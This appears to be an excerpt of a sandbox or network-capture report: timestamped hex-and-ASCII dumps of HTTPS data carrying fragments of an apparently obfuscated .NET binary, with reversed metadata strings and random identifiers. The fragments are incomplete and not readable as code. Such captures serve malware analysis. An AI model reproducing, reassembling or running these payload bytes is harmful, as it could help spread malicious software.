80 12 06 04 0e 29 81 12 1d 01 00 07 d8 80 12 00 00 05 08 01 01 00 04 18 18 02 02 08 29 81 12 29 81 12 18
                                                                                  Data Ascii: E==q=q=4= 4)4)))
                                                                                  2022-05-02 11:03:03 UTC1595INData Raw: 73 68 56 00 31 52 6d 71 4d 62 39 53 69 6f 00 37 76 38 76 63 76 39 72 50 45 00 65 53 4d 6e 6a 74 39 46 71 72 00 6c 6d 31 49 79 65 39 33 33 4a 00 48 4a 71 54 5a 66 39 79 4e 79 00 48 68 47 31 59 71 39 79 41 4f 00 67 72 33 52 74 5a 39 67 66 4d 00 6d 55 69 44 53 50 39 36 34 49 00 6f 36 69 44 6d 68 39 57 68 62 00 62 52 78 69 42 67 39 68 47 43 00 77 44 72 51 6d 70 39 78 6b 63 00 70 6c 59 44 63 46 39 69 68 78 00 75 54 74 63 51 55 39 68 66 49 00 77 55 4e 78 48 6f 39 6e 63 58 00 6a 44 4f 79 42 6a 39 69 63 4c 00 48 5a 45 4a 70 45 39 56 65 49 00 66 32 38 5a 6b 37 39 58 4b 69 00 62 65 62 31 79 36 39 4a 6a 50 00 6e 71 32 65 63 32 39 50 68 68 00 74 53 4c 51 75 72 39 59 75 4e 00 71 36 6b 46 76 69 39 6f 37 64 00 61 77 77 75 43 57 39 35 4b 77 00 41 33 67 76 49 7a 5a 38 53
                                                                                  Data Ascii: shV1RmqMb9Sio7v8vcv9rPEeSMnjt9Fqrlm1Iye933JHJqTZf9yNyHhG1Yq9yAOgr3RtZ9gfMmUiDSP964Io6iDmh9WhbbRxiBg9hGCwDrQmp9xkcplYDcF9ihxuTtcQU9hfIwUNxHo9ncXjDOyBj9icLHZEJpE9VeIf28Zk79XKibeb1y69JjPnq2ec29PhhtSLQur9YuNq6kFvi9o7dawwuCW95KwA3gvIzZ8S
                                                                                  2022-05-02 11:03:03 UTC1611INData Raw: 4f 55 34 49 00 35 4b 4c 46 59 70 47 45 6e 00 53 75 39 66 32 67 51 54 56 4a 00 6c 50 6f 47 31 4d 51 63 6d 52 00 44 76 66 70 6c 70 51 69 47 45 00 33 43 58 74 79 4b 51 64 64 52 00 36 64 78 6c 39 46 51 34 65 72 00 55 45 4d 53 4f 73 51 48 30 42 00 65 54 72 48 4b 6e 5a 4a 55 00 61 74 61 44 67 6e 69 72 74 53 6f 54 74 65 73 66 66 4f 5f 74 65 67 00 75 49 6d 43 6d 55 51 75 44 74 00 66 50 52 76 43 47 51 79 67 53 00 6f 6b 48 34 62 35 76 41 7a 00 4c 78 44 64 4f 62 63 6d 66 00 48 4a 45 33 61 6f 51 66 4d 66 00 41 61 4b 6d 45 64 75 71 44 00 44 72 74 59 36 4e 51 74 71 66 00 76 5a 61 4f 59 6a 51 72 70 6a 00 41 61 41 70 42 6c 51 39 39 61 00 69 68 6b 4a 41 45 51 6a 37 70 00 55 44 33 59 6c 51 51 49 4d 66 00 73 54 51 4a 45 37 51 5a 61 73 00 6e 59 39 34 55 75 39 6c 65 00 79 72
                                                                                  Data Ascii: OU4I5KLFYpGEnSu9f2gQTVJlPoG1MQcmRDvfplpQiGE3CXtyKQddR6dxl9FQ4erUEMSOsQH0BeTrHKnZJUataDgnirtSoTtesffO_teguImCmUQuDtfPRvCGQygSokH4b5vAzLxDdObcmfHJE3aoQfMfAaKmEduqDDrtY6NQtqfvZaOYjQrpjAaApBlQ99aihkJAEQj7pUD3YlQQIMfsTQJE7QZasnY94Uu9leyr
                                                                                  2022-05-02 11:03:03 UTC1627INData Raw: 67 33 68 76 36 57 74 30 63 78 50 4e 00 79 47 32 77 48 75 55 48 73 35 61 58 36 57 65 53 70 52 45 68 00 56 71 46 63 56 66 4a 55 52 44 6c 74 36 57 51 52 62 4c 43 70 00 5a 61 67 69 74 34 59 6f 63 76 74 77 36 57 5a 4f 6b 4e 36 49 00 65 4b 54 50 34 70 32 61 63 4f 00 72 32 46 6e 6c 4b 32 51 6b 57 00 79 65 4b 54 00 79 72 61 6e 6f 69 74 63 69 44 54 00 79 62 74 43 6c 67 4c 66 49 58 4f 65 36 57 68 75 72 32 4a 6c 00 73 32 65 4d 61 57 43 55 74 48 39 6b 36 57 4e 30 61 46 30 42 00 32 60 79 72 61 6e 6f 69 74 63 69 44 49 00 64 65 70 79 74 6e 75 00 64 36 55 41 39 51 32 35 49 4a 00 73 72 65 74 65 6d 61 72 61 50 78 65 64 6e 49 74 65 47 00 35 59 47 44 6a 37 32 56 34 58 00 6c 35 4d 52 37 31 6c 73 6d 49 66 66 36 57 37 52 39 53 5a 57 00 5a 58 45 41 4e 46 32 76 42 73 00 41 34 38
                                                                                  Data Ascii: g3hv6Wt0cxPNyG2wHuUHs5aX6WeSpREhVqFcVfJURDlt6WQRbLCpZagit4Yocvtw6WZOkN6IeKTP4p2acOr2FnlK2QkWyeKTyranoitciDTybtClgLfIXOe6Whur2Jls2eMaWCUtH9k6WN0aF0B2`yranoitciDIdepytnud6UA9Q25IJsretemaraPxednIteG5YGDj72V4Xl5MR71lsmIff6W7R9SZWZXEANF2vBsA48
                                                                                  2022-05-02 11:03:03 UTC1643INData Raw: 65 64 00 6e 61 70 53 65 6d 69 74 00 6e 61 70 53 65 6d 69 54 65 74 69 72 57 00 73 65 63 69 76 72 65 53 72 65 74 74 61 6d 72 6f 46 00 65 70 79 74 00 74 63 65 6a 62 4f 64 65 7a 69 6c 61 69 74 69 6e 69 6e 55 74 65 47 00 34 58 55 46 46 48 68 72 52 58 76 41 72 57 74 50 65 54 5a 6f 00 35 4d 58 6a 62 44 44 36 5a 63 00 6e 69 67 69 72 4f 68 63 6f 70 45 00 78 61 4d 6e 69 4d 00 73 6b 63 69 54 00 73 64 6e 6f 63 65 73 69 6c 6c 69 4d 00 73 64 6e 6f 63 65 53 00 73 65 74 75 6e 69 4d 00 73 72 75 6f 48 00 73 79 61 44 00 63 55 34 70 6f 5a 33 34 65 4a 51 4f 72 57 4f 55 35 33 73 6d 00 65 54 6d 51 6b 4a 53 53 6d 69 4e 50 72 57 78 54 44 38 46 50 00 4c 5a 59 41 6d 4a 33 6d 78 4d 56 78 72 57 62 4c 5a 50 6d 45 00 65 63 61 70 73 65 6d 61 4e 74 6f 6f 52 00 6e 65 6b 6f 54 79 65 4b 63
                                                                                  Data Ascii: ednapSemitnapSemiTetirWsecivreSrettamroFepyttcejbOdezilaitininUteG4XUFFHhrRXvArWtPeTZo5MXjbDD6ZcnigirOhcopExaMniMskciTsdnocesilliMsdnoceSsetuniMsruoHsyaDcU4poZ34eJQOrWOU53smeTmQkJSSmiNPrWxTD8FPLZYAmJ3mxMVxrWbLZPmEecapsemaNtooRnekoTyeKc
                                                                                  2022-05-02 11:03:03 UTC1659INData Raw: 50 00 73 72 65 74 6e 75 6f 43 6f 49 73 73 65 63 6f 72 50 00 73 74 69 6d 69 4c 61 74 6f 75 51 73 73 65 63 6f 72 50 00 6e 6f 69 74 61 6d 72 6f 66 6e 49 63 69 73 61 42 73 73 65 63 6f 72 50 00 73 75 74 61 74 53 74 4e 6d 75 6d 69 78 61 4d 00 6e 65 7a 6f 72 46 74 6f 4e 73 6e 6f 69 74 63 61 73 6e 61 72 54 00 6e 6f 69 74 63 61 73 6e 61 72 54 6e 49 65 6c 69 46 65 74 75 63 65 78 45 74 6f 6e 6e 61 43 00 6e 6f 69 74 6f 6d 6f 72 50 64 65 72 69 75 71 65 52 6e 6f 69 74 63 61 73 6e 61 72 54 00 74 65 53 74 6f 4e 73 6b 63 61 62 6c 6c 61 43 65 70 6f 63 53 6e 6f 69 74 63 61 73 6e 61 72 54 00 74 6e 65 73 65 72 50 79 64 61 65 72 6c 41 61 74 61 64 61 74 65 4d 66 78 54 00 65 74 6f 6d 65 52 64 65 74 72 6f 70 70 75 73 6e 55 67 6e 69 70 70 61 4d 64 65 74 63 61 73 6e 61 72 54 00 64
                                                                                  Data Ascii: PsretnuoCoIssecorPstimiLatouQssecorPnoitamrofnIcisaBssecorPsutatStNmumixaMnezorFtoNsnoitcasnarTnoitcasnarTnIeliFetucexEtonnaCnoitomorPderiuqeRnoitcasnarTteStoNskcabllaCepocSnoitcasnarTtneserPydaerlAatadateMfxTetomeRdetroppusnUgnippaMdetcasnarTd
                                                                                  2022-05-02 11:03:03 UTC1675INData Raw: 50 32 56 72 34 46 47 6e 78 62 68 46 35 31 77 62 00 6b 4e 5a 42 65 75 75 61 4d 66 44 30 62 61 6a 63 47 67 75 00 44 45 79 75 6a 63 71 73 4c 79 79 4d 62 56 73 6e 62 75 52 00 4a 32 4b 34 68 34 69 31 32 4f 46 4b 62 53 51 6b 43 6d 62 00 45 77 65 56 6b 72 38 73 34 73 33 73 62 56 44 74 61 36 4d 00 6b 66 65 45 6e 54 64 47 63 54 71 47 62 57 48 57 45 46 74 00 49 4f 39 41 37 6e 55 33 36 36 73 4e 62 31 34 32 39 4f 6a 00 39 6d 4e 76 41 54 72 43 53 61 37 6c 62 75 42 71 66 78 41 00 4a 57 58 39 79 42 58 6c 77 55 6e 51 62 51 64 52 6d 30 6a 00 4e 6b 71 72 74 31 50 67 6a 78 57 61 62 71 41 47 48 38 50 00 56 50 39 51 56 76 4c 45 67 6d 5a 64 62 68 65 4f 59 76 43 00 48 49 6e 75 32 72 67 70 62 33 65 35 62 57 51 75 51 4e 58 00 49 34 35 65 6e 6c 62 31 44 74 32 44 62 47 43 61 31 6b
                                                                                  Data Ascii: P2Vr4FGnxbhF51wbkNZBeuuaMfD0bajcGguDEyujcqsLyyMbVsnbuRJ2K4h4i12OFKbSQkCmbEweVkr8s4s3sbVDta6MkfeEnTdGcTqGbWHWEFtIO9A7nU366sNb1429Oj9mNvATrCSa7lbuBqfxAJWX9yBXlwUnQbQdRm0jNkqrt1PgjxWabqAGH8PVP9QVvLEgmZdbheOYvCHInu2rgpb3e5bWQuQNXI45enlb1Dt2DbGCa1k
                                                                                  2022-05-02 11:03:03 UTC1691INData Raw: 74 61 72 6f 63 65 44 65 75 6c 61 56 74 6c 75 61 66 65 44 00 72 65 7a 69 6c 61 69 72 65 53 6c 61 6d 69 63 65 44 00 72 65 7a 69 6c 61 69 72 65 53 65 6d 69 54 65 74 61 44 00 72 65 7a 69 6c 61 69 72 65 53 64 65 6c 69 70 6d 6f 43 00 72 65 7a 69 6c 61 69 72 65 53 72 61 68 43 00 72 65 7a 69 6c 61 69 72 65 53 65 74 79 42 00 72 65 7a 69 6c 61 69 72 65 53 6e 61 65 6c 6f 6f 42 00 72 65 7a 69 6c 61 69 72 65 53 62 6f 6c 42 00 73 72 65 7a 69 6c 61 69 72 65 53 2e 66 75 42 6f 74 6f 72 50 00 72 6f 74 61 72 6f 63 65 44 79 61 72 72 41 00 6e 6f 69 74 61 7a 69 6c 61 69 72 65 53 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 72 65 7a 69 6c 61 69 72 65 53 74 63 65 6a 62 4f 6c 6d 58 00 72 65 7a 69 6c 61 69 72 65 53 6f 74 6f 72 50 6c 6d 58 00 6e 6f 69 74 70 69 72 63 73 65 44 2e
                                                                                  Data Ascii: taroceDeulaVtluafeDrezilaireSlamiceDrezilaireSemiTetaDrezilaireSdelipmoCrezilaireSrahCrezilaireSetyBrezilaireSnaelooBrezilaireSbolBsrezilaireS.fuBotorProtaroceDyarrAnoitazilaireS.emitnuR.metsySrezilaireStcejbOlmXrezilaireSotorPlmXnoitpircseD.
                                                                                  2022-05-02 11:03:03 UTC1707INData Raw: 00 20 cb 00 00 20 23 02 cb 00 00 20 cb 00 00 20 03 02 cb 00 00 23 5a 00 00 1f a3 02 cb 00 00 23 5a 00 00 1f 83 02 cb 00 00 23 5a 00 00 1f 63 02 cb 00 00 23 5a 00 00 1f 43 02 cb 00 00 23 5a 00 00 1f 23 02 cb 00 00 23 5a 00 00 1f 03 02 cb 00 00 23 5a 00 00 1e e3 ca 8d 00 00 20 db 00 00 1e a3 ca 5f 00 00 20 d3 00 00 1e a3 ca 5f 00 00 20 d3 00 00 1e 83 ca 8d 00 00 20 db 00 00 1e 83 ca 8d 00 00 20 db 00 00 1e 63 ca 5f 00 00 20 d3 00 00 1e 63 ca 5f 00 00 20 d3 00 00 1e 43 ca 8d 00 00 20 db 00 00 1e 43 02 cb 00 00 20 fb 00 00 1d c3 02 cb 00 00 20 cb 00 00 1d 43 02 cb 00 00 23 3a 00 00 1d 43 02 cb 00 00 23 3a 00 00 1d 23 02 cb 00 00 20 cb 00 00 1d 23 ca 1d 00 00 20 c3 00 00 1c 83 02 cb 00 00 20 bb 00 00 1c 83 02 cb 00 00 2d e2 00 00 1b c3 02 cb 00 00 20 9b 00 00
                                                                                  Data Ascii: # #Z#Z#Zc#ZC#Z##Z#Z _ _ c_ c_ C C C#:C#:# # -
                                                                                  2022-05-02 11:03:03 UTC1723INData Raw: 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05
                                                                                  Data Ascii: qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
                                                                                  2022-05-02 11:03:03 UTC1739INData Raw: 08 00 00 00 00 71 05 00 07 00 00 00 00 71 05 00 06 00 00 00 00 71 05 00 05 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 0b 00 00 00 00 71 05 00 0a 00 00 00 00 71 05 00 09 00 00 00 00 71 05 00 08 00 00 00 00 71 05 00 07 00 00 00 00 71 05 00 06 00 00 00 00 71 05 00 05 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 cd bb 00 04 00 00 00 00 cd e7 00 03 00 00 00 00 ce fc 00 02 00 00 00 00 cd bb 00 04 00 00 00 00 cd e7 00 03 00 00 00 00 ce fc 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05
                                                                                  Data Ascii: qqqqqqqqqqqqqqqqqqqqqqqqqq
                                                                                  2022-05-02 11:03:03 UTC1755INData Raw: 01 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 0a 10 10 00 00 71 05 00 09 00 00 00 00 71 05 00 08 00 00 00 00 71 05 00 07 00 00 00 00 71 05 00 06 00 00 00 00 71 05 00 05 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05
                                                                                  Data Ascii: qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
                                                                                  2022-05-02 11:03:03 UTC1771INData Raw: 05 00 00 00 00 03 70 00 04 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 03 6e 00 05 00 00 00 00 03 70 00 04 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 03 b7 00 06 00 00 00 00 03 6e 00 05 00 00 00 00 03 70 00 04 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 03 70 00 04 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 02 d1 00 01 00 00 00 00 03 6e 00 05 00 00 00 00 03 70 00 04 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1
                                                                                  Data Ascii: pnpqqnppqqnp
                                                                                  2022-05-02 11:03:03 UTC1787INData Raw: 00 00 00 1a 37 02 d4 00 00 70 51 18 10 00 00 00 07 81 38 1a 37 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a 36 bd 8f 00 01 7e c2 00 16 00 00 00 07 81 24 1a 35 bd 87 00 00 75 59 00 46 00 03 00 00 00 00 1a 35 02 d4 00 00 70 51 18 10 00 00 00 07 81 10 1a 35 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a 35 bd 78 00 01 7e c2 00 16 00 00 00 07 80 fc 1a 35 91 e4 00 00 75 59 00 46 00 03 00 00 00 00 1a 35 02 d4 00 00 70 51 18 10 00 00 00 07 80 e8 1a 35 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a 34 bd 6a 00 01 7e c2 00 16 00 00 00 07 80 d4 1a 33 86 32 00 00 75 59 00 46 00 03 00 00 00 00 1a 33 02 d4 00 00 70 51 18 10 00 00 00 07 80 c0 1a 33 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a 33 bd 5d 00 01 7e c2 00 16 00 00 00 07 80 ac 1a 33 39 8f 00 00 75 59 00 46 00 03
                                                                                  Data Ascii: 7pQ87Lb6~$5uYF5pQ5Lb5x~5uYF5pQ5Lb4j~32uYF3pQ3Lb3]~39uYF
                                                                                  2022-05-02 11:03:03 UTC1803INData Raw: 00 00 00 17 33 02 d4 00 00 70 51 18 10 00 00 00 07 56 d4 17 33 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 17 33 a7 d5 00 01 7e c2 00 16 00 00 00 07 56 c0 17 33 49 39 00 00 75 59 00 46 00 03 00 00 00 00 17 33 02 d4 00 00 70 51 18 10 00 00 00 07 56 ac 17 33 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 17 33 a7 c8 00 01 7e c2 00 16 00 00 00 07 56 98 17 33 36 6f 00 00 75 59 00 46 00 03 00 00 00 00 17 33 02 d4 00 00 70 51 18 10 00 00 00 07 56 84 17 33 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 17 33 a7 bb 00 01 7e c2 00 16 00 00 00 07 56 70 17 33 39 8f 00 00 75 59 00 46 00 03 00 00 00 00 17 33 02 d4 00 00 70 51 18 10 00 00 00 07 56 5c 17 33 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 17 33 a7 ac 00 01 7e c2 00 16 00 00 00 07 56 48 17 33 a7 a5 00 00 75 59 00 46 00 03
                                                                                  Data Ascii: 3pQV3Lb3~V3I9uYF3pQV3Lb3~V36ouYF3pQV3Lb3~Vp39uYF3pQV\3Lb3~VH3uYF
                                                                                  2022-05-02 11:03:03 UTC1819INData Raw: 00 00 00 14 77 02 d4 00 00 70 51 18 10 00 00 00 07 2d 40 14 77 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 14 75 91 d3 00 01 7e c2 00 16 00 00 00 07 2d 28 14 73 91 ca 00 00 75 59 00 46 00 03 00 00 00 00 14 73 02 d4 00 00 70 51 18 10 00 00 00 07 2d 14 14 73 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 14 72 91 bc 00 01 7e c2 00 16 00 00 00 07 2d 00 14 71 91 b6 00 00 75 59 00 46 00 03 00 00 00 00 14 71 02 d4 00 00 70 51 18 10 00 00 00 07 2c ec 14 71 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 14 6f 91 a4 00 01 7e c2 00 16 00 00 00 07 2c d8 14 6d 91 9a 00 00 75 59 00 46 00 03 00 00 00 00 14 6d 02 d4 00 00 70 51 18 10 00 00 00 07 2c c4 14 6d 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 14 6b 91 89 00 01 7e c2 00 16 00 00 00 07 2c ac 14 69 91 80 00 00 75 59 00 46 00 03
                                                                                  Data Ascii: wpQ-@wLbu~-(suYFspQ-sLbr~-quYFqpQ,qLbo~,muYFmpQ,mLbk~,iuYF
                                                                                  2022-05-02 11:03:03 UTC1835INData Raw: 00 00 00 11 f1 02 d4 00 00 70 51 18 10 00 00 00 07 04 5c 11 f1 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 11 f1 7d 04 00 01 7e c2 00 16 00 00 00 07 04 48 11 f1 70 ae 00 00 75 59 00 46 00 03 00 00 00 00 11 f1 02 d4 00 00 70 51 18 10 00 00 00 07 04 34 11 f1 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 11 f1 7c f7 00 01 7e c2 00 16 00 00 00 07 04 20 11 f1 70 ae 00 00 75 59 00 46 00 03 00 00 00 00 11 f1 02 d4 00 00 70 51 18 10 00 00 00 07 04 0c 11 f1 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 11 f1 7c ea 00 01 7e c2 00 16 00 00 00 07 03 f8 11 f1 39 8f 00 00 75 59 00 46 00 03 00 00 00 00 11 f1 02 d4 00 00 70 51 18 10 00 00 00 07 03 e4 11 f1 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 11 f1 7c dd 00 01 7e c2 00 16 00 00 00 07 03 d0 11 f1 36 6f 00 00 75 59 00 46 00 03
                                                                                  Data Ascii: pQ\Lb}~HpuYFpQ4Lb|~ puYFpQLb|~9uYFpQLb|~6ouYF
                                                                                  2022-05-02 11:03:03 UTC1851INData Raw: 06 26 50 0f 81 0d 1c 00 01 5f e1 02 c3 00 00 00 06 26 40 0f 7f 69 d7 00 00 00 62 18 86 00 00 00 06 25 ec 0f 7f 69 c7 00 01 60 61 00 93 00 00 00 06 25 dc 0f 7f 02 d8 00 01 60 4c 00 93 00 00 00 06 25 c8 0f 7f 02 d4 00 00 70 51 18 91 00 00 00 06 25 b4 0f 7f 02 f8 00 01 57 43 02 c3 00 00 00 06 25 94 0f 7e 68 c4 00 01 5a 24 02 c3 00 00 00 06 25 38 0f 7d 68 c4 00 01 5a 0e 02 c3 00 00 00 06 24 d8 0f 7d 02 f8 00 01 5a 03 02 c3 00 00 00 06 24 b8 0f 7d 68 b5 00 01 59 f8 02 c3 00 00 00 06 24 60 0f 7c 68 8f 00 01 57 22 02 c3 00 00 00 06 24 10 0f 7b 68 51 00 01 5f ec 02 c3 00 00 00 06 23 ec 0f 7b 0d 1c 00 01 5f e1 02 c3 00 00 00 06 23 dc 0f 7a 68 51 00 01 56 eb 02 c3 00 00 00 06 23 c0 0f 79 68 51 00 01 56 e0 02 c3 00 00 00 06 22 a4 0f 77 69 b5 00 00 00 62 18 86 00 00
                                                                                  Data Ascii: &P_&@ib%i`a%`L%pQ%WC%~hZ$%8}hZ$}Z$}hY$`|hW"${hQ_#{_#zhQV#yhQV"wib
                                                                                  2022-05-02 11:03:03 UTC1867INData Raw: 04 60 c4 0c 25 59 57 00 01 34 05 00 81 00 00 00 04 5f f8 0c 1e 59 2e 00 01 33 eb 00 83 00 00 00 04 5a 68 0c 1a 59 1c 00 01 33 e0 00 81 00 00 00 04 59 38 0c 18 59 12 00 01 33 d8 01 c5 00 00 00 04 59 2c 0c 17 59 09 00 01 33 d8 00 85 00 00 00 04 59 14 0c 17 02 f8 00 01 26 1c 01 c5 00 00 00 04 59 08 0c 17 02 d4 00 00 70 51 18 91 00 00 00 04 58 f4 0c 16 1b 73 00 00 ae 04 01 c6 00 03 00 00 00 00 0c 12 58 e9 00 00 ad dd 01 c6 00 03 00 00 00 00 0c 10 58 e1 00 00 75 59 01 c6 00 03 00 00 00 00 0c 0e 0e 4c 00 00 00 62 18 86 00 03 00 00 00 00 0c 0e 58 db 00 01 33 7f 00 93 00 00 00 04 58 e4 0c 0e 02 d8 00 01 33 6a 00 93 00 00 00 04 58 d0 0c 0e 02 d4 00 00 70 51 18 91 00 00 00 04 58 bc 0c 0d 36 a2 00 00 00 62 18 83 00 00 00 04 58 48 0c 0c 00 e1 00 00 00 62 18 83 00 00
                                                                                  Data Ascii: `%YW4_Y.3ZhY3Y8Y3Y,Y3Y&YpQXsXXuYLbX3X3jXpQX6bXHb
                                                                                  2022-05-02 11:03:03 UTC1883INData Raw: 02 37 1c 07 ee 00 b3 00 00 00 62 18 83 00 00 00 02 36 f4 07 ee 02 d4 00 00 70 51 18 91 00 00 00 05 0b b0 07 ed 3d ae 00 00 ae 04 01 c6 00 03 00 00 00 00 07 ea 16 90 00 00 ad dd 01 c6 00 03 00 00 00 00 07 e9 3d a7 00 00 75 59 01 c6 00 03 00 00 00 00 07 e7 0e 4c 00 00 00 62 18 86 00 03 00 00 00 00 07 e7 3d 9d 00 00 f5 f0 00 93 00 00 00 05 0b a0 07 e7 02 d8 00 00 f5 db 00 93 00 00 00 05 0b 8c 07 e7 02 d4 00 00 70 51 18 91 00 00 00 05 0b 78 07 e6 34 28 00 00 e1 e6 08 96 00 00 00 05 0b 50 07 e6 02 d8 00 00 e1 d1 08 96 00 00 00 05 0b 30 07 e6 3d 92 00 00 f5 b1 00 93 00 00 00 05 0b 20 07 e6 02 d8 00 00 f5 9c 00 93 00 00 00 05 0b 0c 07 e6 02 d4 00 00 70 51 18 91 00 00 00 05 0a f8 07 e5 3d 8b 00 00 f4 4d 00 96 00 00 00 05 0a a4 07 e4 34 9c 00 00 f5 8f 00 96 00 00
                                                                                  Data Ascii: 7b6pQ==uYLb=pQx4(P0= pQ=M4
                                                                                  2022-05-02 11:03:03 UTC1899INData Raw: 01 19 1c 02 76 22 39 00 00 c1 8b 00 93 00 00 00 01 19 0c 02 76 02 d8 00 00 c1 76 00 93 00 00 00 01 18 f8 02 76 02 d4 00 00 70 51 18 91 00 00 00 01 18 e4 02 75 14 5d 00 00 c1 6b 00 91 00 00 00 01 18 c4 02 73 22 2c 00 00 c1 3b 00 91 00 00 00 01 18 4c 02 73 02 d4 00 00 c1 30 00 91 00 00 00 01 17 1c 02 72 1e f2 00 00 02 d1 00 93 00 00 00 01 16 ac 02 72 02 d4 00 00 70 51 18 91 00 00 00 01 16 98 02 72 0e a0 00 00 c1 06 00 93 00 00 00 01 16 84 02 72 11 06 00 00 c0 f1 00 93 00 00 00 01 16 70 02 72 04 f3 00 00 c0 dc 00 93 00 00 00 01 16 5c 02 72 0e a0 00 00 c0 c7 00 93 00 00 00 01 16 48 02 72 12 7b 00 00 c0 a9 00 93 00 00 00 01 16 30 02 72 22 08 00 00 c0 94 00 93 00 00 00 01 16 20 02 72 02 d8 00 00 c0 7f 00 93 00 00 00 01 16 0c 02 72 02 d4 00 00 70 51 18 91 00 00
                                                                                  Data Ascii: v"9vvvpQu]ks",;Ls0rrpQrrpr\rHr{0r" rrpQ
                                                                                  2022-05-02 11:03:03 UTC1915INData Raw: 38 00 13 99 ec 00 01 96 2d 00 13 99 dd 00 01 96 22 00 13 99 bf 00 01 96 17 00 13 99 b0 00 01 96 0c 00 13 99 a3 00 01 96 01 00 13 99 85 00 01 95 f6 00 13 99 69 00 01 95 eb 00 13 99 45 00 01 95 e0 00 13 99 27 00 01 95 d5 00 13 99 09 00 01 95 ca 00 13 98 e9 00 01 95 bf 00 13 98 da 00 01 95 b4 00 13 98 cb 00 01 95 a9 00 13 98 b1 00 01 95 9e 00 13 98 95 00 01 95 93 00 13 98 85 00 01 95 88 00 13 98 6b 00 01 95 7d 00 13 98 55 00 01 95 72 00 13 98 45 00 01 95 67 00 13 98 2d 00 01 95 5c 00 13 98 13 00 01 95 51 00 13 98 06 00 01 95 46 00 13 97 d6 00 01 95 3b 00 13 97 be 00 01 95 30 00 13 97 a8 00 01 95 25 00 13 97 8c 00 01 95 1a 00 13 97 7b 00 01 95 0f 00 13 97 6b 00 01 95 04 00 13 97 4d 00 01 94 f9 00 13 97 33 00 01 94 ee 00 13 97 23 00 01 94 e3 00 13 97 15 00 01
                                                                                  Data Ascii: 8-"iE'k}UrEg-\QF;0%{kM3#
